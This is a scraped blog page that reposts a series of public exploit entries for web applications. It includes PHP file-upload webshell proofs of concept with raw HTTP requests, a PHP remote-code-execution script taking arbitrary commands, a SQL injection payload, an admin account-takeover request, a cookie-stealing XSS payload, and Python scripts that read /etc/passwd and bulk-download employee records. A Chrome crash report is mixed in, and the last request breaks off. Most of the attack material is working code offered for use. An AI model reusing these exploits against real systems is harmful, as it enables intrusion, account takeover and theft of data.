Exploit Title: ProjeQtOr Project Management System 10.3.2 -Remote Code Execution (RCE)
Application: ProjeQtOr Project Management System
Version: 10.3.2
Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://www.projeqtor.org
Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download
Date of found: 19.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
Possible including php file with phar extension while uploading image. Rce is triggered when we visit again
Payload:<?php echo system("id"); ?>
poc request:
POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1
Host: localhost
Content-Length: 1177
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/projeqtor/view/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic
Connection: close
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar"
Content-Type: application/octet-stream
<?php echo system("id"); ?>
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentId"
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefType"
User
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefId"
1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentType"
file
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10485760
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentLink"
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentDescription"
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentPrivacy"
1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="uploadType"
html5
------WebKitFormBoundaryY0bpJaQzcvQberWR--
visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863114825
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
<?php
/*
Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution
Date: 12/05/2023
Exploit Author: Chokri Hammedi
Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
Software Link: https://github.com/thrsrossi/Millhouse-Project.git
Version: 1.414
Tested on: Debian
CVE: N/A
*/
$options = getopt('u:c:');
if(!isset($options['u'], $options['c']))
die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi
\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
\033[0m\n
\n");
$target = $options['u'];
$command = $options['c'];
$url = $target . '/includes/add_post_sql.php';
$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="title"
helloworld
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="description"
<p>sdsdsds</p>
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="category"
1
------WebKitFormBoundaryzlHN0BEvvaJsDgh8
Content-Disposition: form-data; name="image"; filename="rose.php"
Content-Type: application/x-php
<?php
$shell = shell_exec("' . $command . '");
echo $shell;
?>
------WebKitFormBoundaryzlHN0BEvvaJsDgh8--
';
$headers = array(
'Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
'Cookie: PHPSESSID=rose1337',
);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
$response = curl_exec($ch);
curl_close($ch);
// execute command
$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
$ch = curl_init($shell);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$exec_shell = curl_exec($ch);
curl_close($ch);
echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";
?>
[#] Exploit Title: WBiz Desk 1.2 - SQL Injection
[#] Exploit Date: May 12, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: WBiz Desk
[#] Application Version: 1.2
[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system
[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: SQL@hotmail.co.uk
[#] Blog: https://www.0wl.tech
[#] 3xploit:
[path]//ticket.php?tk=[SQL Injection]
[#] 3xample:
[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -
[#] Notes:
- The vulnerability requires a non-admin privilege (normal) user to be exploited.
## Exploit Title: Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS)
## Exploit Author: LiquidWorm
Vendor: Google LLC
Product web page: https://www.google.com
Affected version: 111.0.5563.64 (Official Build) (x86_64)
110.0.5481.100 (Official Build) (x86_64)
108.0.5359.124 (Official Build) (x86_64)
108.0.5359.98 (Official Build) (x86_64)
Fixed version: 112.0.5615.49 (Official Build) (x86_64)
Summary: Google Chrome browser is a free web browser used for
accessing the internet and running web-based applications. The
Google Chrome browser is based on the open source Chromium web
browser project. Google released Chrome in 2008 and issues several
updates a year.
Desc: Fatal OOM/crash of Chrome browser while detaching/attaching
tabs on macOS.
Commit fix:
"The original cl landed many months ago, but
chrome/browser/ui/views/frame/browser_non_client_frame_view_mac.mm
is the only change that didn't revert cleanly."
macOS a11y: Implement accessibilityHitTest for remote app shims (PWAs)
Implements accessibility hit testing for RemoteCocoa so that Hover Text
and VoiceOver mouse mode can read the accessible objects under the
user's pointer. Cross-process plumbing was needed because RemoteCocoa
bridges to native controls in a separate app shim process and must
report accessibility trees from the browser process via the
undocumented NSAccessibilityRemoteUIElement mechanism.
This CL does the following:
1. Unblocks remote accessibilityHitTest by calling setRemoteUIApp:YES
in the browser process. This enables the browser process to accept
redirected accessibilityHitTest calls to the object corresponding to
any NSAccessibilityRemoteUIElement returned by the original
accessibilityHitTest at the app shim process.
2. (For Browser UI) Overrides NativeWidgetMacNSWindowTitledFrame's
accessibilityHitTest to have a custom implementation with
NSAccessibilityRemoteUIElement support so that custom window
controls can be found. Additionally, adjusts the BrowserView bounds
so that AXPlatformNodeCocoa's accessibilityHitTest (which doesn't
support view targeting) can return controls in the web app frame
toolbar.
3. (For Web Content) Implements RenderWidgetHostViewCocoa's
accessibilityHitTest for instances in the app shim to return a
NSAccessibilityRemoteUIElement corresponding to their counterparts
in the browser process so that web content objects can be found.
Tested on: macOS 12.6.1 (Monterey)
macOS 13.3.1 (Ventura)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5770
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5770.php
08.12.2022
--
UI PoC:
-------
1. Grab a tab and detach it.
2. Bring back the tab.
3. Do this 2-3 times attaching / re-attaching the tab.
4. Chrome will hang (100% CPU) / Out-of-Memory (OOM) for 7-8 minutes.
5. Process crashes entirely.
Ref: Issue 1400682 (Ticket created: Dec 13, 2022)
Ref: https://bugs.chromium.org/p/chromium/issues/detail?id=1400682
Ref: https://chromium-review.googlesource.com/c/chromium/src/+/3861171
Ref: axtester.mm terminal PoC by xi.ch...@gmail.com (https://bugs.chromium.org/u/161486905)
=============
//
// Copyright (c) Microsoft Corporation. All rights reserved.
//
#include <ApplicationServices/ApplicationServices.h>
#include <iostream>
#include <sstream>
#include <vector>
__BEGIN_DECLS
// NOLINTNEXTLINE
AXError _AXUIElementGetWindow(AXUIElementRef, CGWindowID *);
// NOLINTNEXTLINE
CFTypeID AXTextMarkerGetTypeID();
__END_DECLS
std::ostream& bold_on(std::ostream& os)
{
if (isatty(STDOUT_FILENO))
{
return os << "\e[1m";
}
return os;
}
std::ostream& bold_off(std::ostream& os)
{
if (isatty(STDOUT_FILENO))
{
return os << "\e[0m";
}
return os;
}
std::string from_cfstr(CFTypeRef cf_ref)
{
if (cf_ref != nullptr && CFGetTypeID(cf_ref) == CFStringGetTypeID())
{
const auto cf_str = static_cast<CFStringRef>(cf_ref);
const auto max_length = static_cast<size_t>(CFStringGetMaximumSizeForEncoding(
CFStringGetLength(cf_str), kCFStringEncodingUTF8)) + 1;
auto result = std::string(max_length, '\0');
if (CFStringGetCString(cf_str, result.data(), static_cast<CFIndex>(max_length), kCFStringEncodingUTF8))
{
if (const auto pos = result.find('\0'); pos != std::string::npos)
{
result.resize(pos);
}
return result;
}
}
return {};
}
std::string ax_element_id(AXUIElementRef value)
{
// AX element cache - AX elements are backed by CFData
// (referring to 'remote' AX objects) and this data is
// 'stable' across 'volatile' instances of AXUIElement.
// 'hash and equality' of AX elements are based on this
// data and therefore, we can use AXUIElement objects as
// 'keys' in a dictionary with values, identifying these
// objects (uniquely).
const static auto ax_elements = CFDictionaryCreateMutable(kCFAllocatorDefault, 0,
&kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
auto ax_id = CFDictionaryGetValue(ax_elements, value);
if (ax_id == nullptr)
{
if (const auto uuid = CFUUIDCreate(kCFAllocatorDefault))
{
if (const auto uuid_s = CFUUIDCreateString(kCFAllocatorDefault, uuid))
{
CFDictionarySetValue(ax_elements, value, uuid_s);
CFRelease(uuid_s);
}
CFRelease(uuid);
}
ax_id = CFDictionaryGetValue(ax_elements, value);
}
return from_cfstr(ax_id);
}
template <typename T>
T ax_attribute_value(AXUIElementRef e, CFStringRef name)
{
if (e != nullptr)
{
auto ref = T{};
if (AXUIElementCopyAttributeValue(e, name, (CFTypeRef *) &ref) == kAXErrorSuccess)
{
return ref;
}
}
return nullptr;
}
// NOLINTNEXTLINE
void ax_traverse(AXUIElementRef elem, uint32_t depth)
{
const auto max_depth = 10;
if (depth > max_depth)
{
return;
}
const auto indent = [&]()
{
for (auto x = 0; x < depth; x++)
{
std::cout << " ";
}
};
auto wid = CGWindowID{};
if (_AXUIElementGetWindow(elem, &wid) != kAXErrorSuccess)
{
wid = 0;
}
indent();
const auto role = ax_attribute_value<CFTypeRef>(elem, kAXRoleAttribute);
std::cout << bold_on << "[*** DEPTH: " << depth << ", ROLE: " << from_cfstr(role) <<
", ID: " << ax_element_id(elem) << ", WINDOW: " << wid << " ***]" << bold_off <<
std::endl;
if (const auto children = ax_attribute_value<CFArrayRef>(elem, kAXChildrenAttribute))
{
for (CFIndex idx = 0; idx < CFArrayGetCount(children); idx++)
{
const auto element = static_cast<AXUIElementRef>(CFArrayGetValueAtIndex(children, idx));
ax_traverse(element, depth + 1);
}
CFRelease(children);
}
}
int main(int argc, char* const argv[])
{
auto pid = 0;
if (argc > 1)
{
if (!AXIsProcessTrusted())
{
std::cerr << "Please 'AX approve' Terminal in System Preferences" << std::endl;
exit(1); // NOLINT
}
// NOLINTNEXTLINE
pid = std::stoi(argv[1]);
}
else
{
std::cerr << "usage: axtester <pid>" << std::endl;
exit(1); // NOLINT
}
if (const auto app = AXUIElementCreateApplication(pid))
{
auto observer = AXObserverRef{};
auto ret = AXObserverCreate(pid, [](auto /*unused*/, AXUIElementRef /*unused*/, CFStringRef name, auto ctx)
{
auto myapp = (__AXUIElement*)(ctx);
auto hint = CFStringGetCStringPtr(name,kCFStringEncodingUTF8);
std::cout << "Hint: " << hint << std::endl;
ax_traverse(myapp, 0);
}, &observer);
if (kAXErrorSuccess != ret)
{
std::cerr << "Fail to create observer" << std::endl;
return -1;
}
std::cout << "title:" << AXObserverAddNotification(observer, app, kAXTitleChangedNotification, (void*)app) << std::endl;
std::cout << "focus_window:" << AXObserverAddNotification(observer, app, kAXFocusedWindowChangedNotification, (void*)app) << std::endl;
std::cout << "focus_element:" << AXObserverAddNotification(observer, app, kAXFocusedUIElementChangedNotification, (void*)app) << std::endl;
std::cout << "move:" << AXObserverAddNotification(observer, app, kAXWindowMovedNotification, (void*)app) << std::endl;
std::cout << "resize:" << AXObserverAddNotification(observer, app, kAXWindowResizedNotification, (void*)app) << std::endl;
std::cout << "deminiaturized:" << AXObserverAddNotification(observer, app, kAXWindowDeminiaturizedNotification, (void*)app) << std::endl;
std::cout << "miniaturize:" << AXObserverAddNotification(observer, app, kAXWindowMiniaturizedNotification, (void*)app) << std::endl;
CFRunLoopAddSource(CFRunLoopGetCurrent(), AXObserverGetRunLoopSource(observer), kCFRunLoopDefaultMode);
CFRunLoopRun();
}
return 0;
}
--codeaibot explains--
This is a C++ program that uses the Accessibility API (AX) provided
by macOS to traverse the user interface of a running application and
print out information about the accessibility elements that it finds.
The program takes a single argument, which is the process ID (PID) of
the application to examine. If no argument is provided, the program
displays a usage message and exits.
The main() function first checks if the Terminal app has been granted
accessibility privileges by calling the AXIsProcessTrusted() function.
If it hasn't, the program displays an error message and exits.
If the Terminal app has been granted accessibility privileges, the program
creates an AXUIElementRef object for the application using the AXUIElementCreateApplication()
function, passing in the PID as an argument.
The ax_traverse() function is then called with the root accessibility
element of the application as an argument. This function recursively
traverses the accessibility tree of the application, printing out
information about each element it encounters.
The program also defines several helper functions for working with Core
Foundation types (from_cfstr(), ax_element_id(), and ax_attribute_value()),
as well as some functions for printing formatted output to the console
(bold_on() and bold_off()).
-- / --
As this issue is not a security issue nor results in security consequences,
this report is not eligible for a VRP reward.
++
Thank you Amy!
--
## Exploit Title: Bludit 4.0.0-rc-2 - Account takeover
## Author: nu11secur1ty
## Date: 04.11.2013
## Vendor: https://www.bludit.com/
## Software: https://github.com/bludit/bludit/releases/tag/4.0.0-rc-2
## Reference: https://www.cloudflare.com/learning/access-management/account-takeover/
## Reference: https://portswigger.net/daily-swig/facebook-account-takeover-researcher-scoops-40k-bug-bounty-for-chained-exploit
## Description:
The already authenticated attacker can send a normal request to change
his password and then he can use
the same JSON `object` and the vulnerable `API token KEY` in the same
request to change the admin account password.
Then he can access the admin account and he can do very malicious stuff.
STATUS: HIGH Vulnerability
[+]Exploit:
```PUT
PUT /api/users/admin HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 138
sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50
Safari/537.36
content-type: application/json
Accept: */*
Origin: http://127.0.0.1:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8000/admin/edit-user/pwned
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: BLUDIT-KEY=98t31p2g0i7t6rscufuccpthui
Connection: close
{"token":"4f8df9f64e84fa4562ec3a604bf7985c","authentication":"6d1a5510a53f9d89325b0cd56a2855a9","username":"pwned","password":"password1"}
```
[+]Response:
```HTTP
HTTP/1.1 200 OK
Host: 127.0.0.1:8000
Date: Tue, 11 Apr 2023 08:33:51 GMT
Connection: close
X-Powered-By: PHP/7.4.30
Access-Control-Allow-Origin: *
Content-Type: application/json
{"status":"0","message":"User edited.","data":{"key":"admin"}}
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bludit/2023/Bludit-v4.0.0-Release-candidate-2)
## Proof and Exploit:
[href](https://streamable.com/w3aa4d)
## Time spend:
00:57:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-Site
Scripting (XSS) (Authenticated)
# Date: 11.10.2023
# Exploit Author: Furkan ÖZER
# Software Link: https://wordpress.org/plugins/advanced-page-visit-counter/
# Version: 8.0.5
# Tested on: Kali-Linux,Windows10,Windows 11
# CVE: N/A
# Description:
Advanced Page Visit Counter is a remarkable Google Analytics alternative
specifically designed for WordPress websites, and it has quickly become a
must-have plugin for website owners and administrators seeking powerful
tracking and analytical capabilities. With the recent addition of Enhanced
eCommerce Tracking for WooCommerce, this plugin has become even more
indispensable for online store owners.
Homepage | Support | Premium Version
If you’re in search of a GDPR-friendly website analytics plugin exclusively
designed for WordPress, look no further than Advanced Page Visit Counter.
This exceptional plugin offers a compelling alternative to Google Analytics
and is definitely worth a try for those seeking enhanced data privacy
compliance.
This is a free plugin and doesn’t require you to create an account on
another site. All features outlined below are included in the free plugin.
Description of the owner of the plugin Stored Cross-Site Scripting attack
against the administrators or the other authenticated users.
The plugin does not sanitise and escape some of its settings, which could
allow high privilege users such as admin to perform Stored Cross-Site
Scripting attacks even when the unfiltered_html capability is disallowed
(for example in multisite setup)
The details of the discovery are given below.
# Steps To Reproduce:
1. Install and activate the Advanced Page Visit Counter plugin.
2. Visit the "Settings" interface available in settings page of the plugin
that is named "Widget Settings"
3. In the plugin's "Today's Count Label" setting field, enter the payload
Payload: " "type=image src=1 onerror=alert(document.cookie)> "
6. Click the "Save Changes" button.
7. The XSS will be triggered on the settings page when every visit of an
authenticated user.
# Video Link
https://youtu.be/zcfciGZLriM
# Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal
# Exploit Author: Al Baradi Joy
# Exploit Date: April 6, 2025
# CVE ID: CVE-2025-31131
# Vendor Homepage: https://yeswiki.net/
# Software Link: https://github.com/YesWiki/yeswiki
# Affected Version: < 4.5.2
# Tested On: YesWiki 4.5.1 on Ubuntu 22.04
# Vulnerability Type: Unauthenticated Path Traversal (LFI)
# CVSS Score: 8.6 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
# Description:
# YesWiki before version 4.5.2 is vulnerable to unauthenticated path
traversal via the 'squelette' parameter.
# A remote attacker can exploit this issue to read arbitrary files on the
server, such as /etc/passwd.
import requests
import sys
def banner():
print("=" * 80)
print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal
(CVE-2025-31131)")
print(" Exploit Author: Al Baradi Joy")
print("=" * 80)
def exploit(target, filename="/etc/passwd"):
if not target.startswith("http"):
target = "http://" + target
traversal = "../" * 8
encoded_file = filename.replace("/", "%2f")
payload =
f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css"
url = target.rstrip("/") + payload
try:
print(f"[+] Target: {target}")
print(f"[+] Attempting to read: {filename}")
response = requests.get(url, timeout=10)
if response.status_code == 200 and "root:" in response.text:
print("[+] Exploit successful. File contents:\n")
print(response.text)
else:
print("[!] Exploit failed or file not readable.")
print(f"Status Code: {response.status_code}")
if len(response.text) < 200:
print(f"Response:\n{response.text}")
except requests.exceptions.RequestException as e:
print(f"[!] Request failed: {e}")
if __name__ == "__main__":
banner()
if len(sys.argv) < 2:
print(f"Usage: python3 {sys.argv[0]} <target_url> [file_to_read]")
print(f"Example: python3 {sys.argv[0]} http://victim.com
/etc/passwd")
sys.exit(1)
target_url = sys.argv[1]
file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
exploit(target_url, file_to_read)
Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)
Application: webutler Cms
Version: v3.2
Bugs: RCE
Technology: PHP
Vendor URL: https://webutler.de/en
Software Link: http://webutler.de/download/webutler_v3.2.zip
Date of found: 03.08.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1. login to account as admin
2. go to visit media
3.upload phar file
4. upload poc.phar file
poc.phar file contents :
<?php echo system("cat /etc/passwd");?>
5. Visit to poc.phar file
poc request:
POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1
Host: localhost
Content-Length: 40
sec-ch-ua:
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
X_FILENAME: poc.phar
sec-ch-ua-platform: ""
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/webutler_v3.2/admin/browser/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropolu
Connection: close
<?php echo system("cat /etc/passwd");?>
# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
# Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office"
# Date: 09/Dec/2022
# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)
# Vendor Homepage: https://smartofficepayroll.com/
# Software Link: https://smartofficepayroll.com/downloads
# Version: Smart Office Web 20.28 and before
# CVE Number : CVE-2022-47075 and CVE-2022-47076
# CVSS : 7.5 (High)
# Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/
# Vulnerability Description:
# Smart Office Web 20.28 and before allows Remote Information Disclosure(Unauthenticated) via insecure direct object reference (IDOR). This was fixed in latter version except for ExportEmployeeDetails.
import wget
import os
from colorama import Fore, Style
def download_file(url, filename):
wget.download(url, filename)
# Disclaimer
print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.")
print("The author takes no responsibility for any unauthorized usage.")
print("Please use this script responsibly and adhere to the legal and ethical guidelines.")
agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ")
if agree != "1":
print("You have chosen not to agree. Exiting the script.")
exit()
# Print name in red
name = "Exploit by Tejas Nitin Pingulkar"
print(Fore.RED + name)
print(Style.RESET_ALL) # Reset color
website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ")
target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ")
folder_name = input("Enter the folder name to save the files: ")
# Create the folder if it doesn't exist
if not os.path.exists(folder_name):
os.makedirs(folder_name)
urls_filenames = []
if target_version == "1":
urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv"))
else:
urls_filenames.extend([
(website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"),
(website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"),
(website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"),
(website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv")
])
print("CVE-2022-47076: Obtain user ID and password from downloaded source")
for url, filename in urls_filenames:
download_file(url, os.path.join(folder_name, filename))
# Print "for more such interesting exploits, visit cvewalkthrough.com" in red
print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com")
print(Style.RESET_ALL) # Reset color
# Exploit Title: MoziloCMS 3.0 - Remote Code Execution (RCE)
# Date: 10/09/2024
# Exploit Author: Secfortress (https://github.com/sec-fortress)
# Vendor Homepage: https://mozilo.de/
# Software Link:
https://github.com/moziloDasEinsteigerCMS/mozilo3.0/archive/refs/tags/3.0.1.zip
# Version: 3.0
# Tested on: Debian
# Reference: https://vulners.com/cve/CVE-2024-44871
# CVE : CVE-2024-44871
"""
################
# Description #
################
MoziloCMS version 3.0 suffers from an arbitrary file upload vulnerability
in the component "/admin/index.php" which allows an authenticated attacker
to execute arbitrary code on the "Files" session by uploading a maliciously
crafted .JPG file and subsequently renaming its extension to .PHP using the
application's renaming function.
#####################
# PoC for webshell #
#####################
Steps to Reproduce:
1. Login as admin
2. Go to the Files session by the left menu
3. Create a .jpg file with it content having a php web shell
4. Upload the file to the server via the upload icon and save
5. Rename the file to .php on the web server and save
6. Access webshell via this endpoint :
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php
==========================
Request 1 => Upload File: #
==========================
POST /mozilo3.0-3.0.1/admin/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101
Firefox/115.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------186462060042780927583949521447
Content-Length: 607
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer:
http://127.0.0.1/mozilo3.0-3.0.1/admin/index.php?nojs=true&action=files&multi=true
Cookie: mozilo_editor_settings=true,false,mozilo,12px;
3f57633367583b9bf11d8e979ddc8e2b=gucvcppc86c62nnaefqjelq4ep;
PHPSESSID=p7qq7p1t9sg9ke03mnrp48ir5b;
MOZILOID_24b094c9c2b05ae0c5d9a85bc52a8ded=8civmp61qbc8hmlpg82tit1noo
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------186462060042780927583949521447
Content-Disposition: form-data; name="curent_dir"
Willkommen
-----------------------------186462060042780927583949521447
Content-Disposition: form-data; name="chancefiles"
true
-----------------------------186462060042780927583949521447
Content-Disposition: form-data; name="action"
files
-----------------------------186462060042780927583949521447
Content-Disposition: form-data; name="files[]"; filename="revshell.jpg"
Content-Type: image/jpeg
<?=`$_GET[0]`?>
-----------------------------186462060042780927583949521447--
===========================
Request 2 => Rename File: #
===========================
POST /mozilo3.0-3.0.1/admin/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101
Firefox/115.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 98
Origin: http://127.0.0.1
DNT: 1
Connection: close
Referer:
http://127.0.0.1/mozilo3.0-3.0.1/admin/index.php?nojs=true&action=files&multi=true
Cookie: mozilo_editor_settings=true,false,mozilo,12px;
3f57633367583b9bf11d8e979ddc8e2b=gucvcppc86c62nnaefqjelq4ep;
PHPSESSID=p7qq7p1t9sg9ke03mnrp48ir5b;
MOZILOID_24b094c9c2b05ae0c5d9a85bc52a8ded=8civmp61qbc8hmlpg82tit1noo
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
action=files&newfile=revshell.php&orgfile=revshell.jpg&curent_dir=Willkommen&changeart=file_rename
####################
# Webshell access: #
####################
# Wenshell access via curl:
curl
http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php?0=whoami
# Output:
www-data
"""
# Exploit Title: Wallos - File Upload RCE (Authenticated)
# Date: 2024-03-04
# Exploit Author: sml@lacashita.com
# Vendor Homepage: https://github.com/ellite/Wallos
# Software Link: https://github.com/ellite/Wallos
# Version: < 1.11.2
# Tested on: Debian 12
Wallos allows you to upload an image/logo when you create a new subscription.
This can be bypassed to upload a malicious .php file.
POC
---
1) Log into the application.
2) Go to "New Subscription"
3) Upload Logo and choose your webshell .php
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:
--- SNIP -----------------
POST /endpoints/subscription/add.php HTTP/1.1
Host: 192.168.1.44
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.44/
Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324
Origin: http://192.168.1.44
Content-Length: 7220
Connection: close
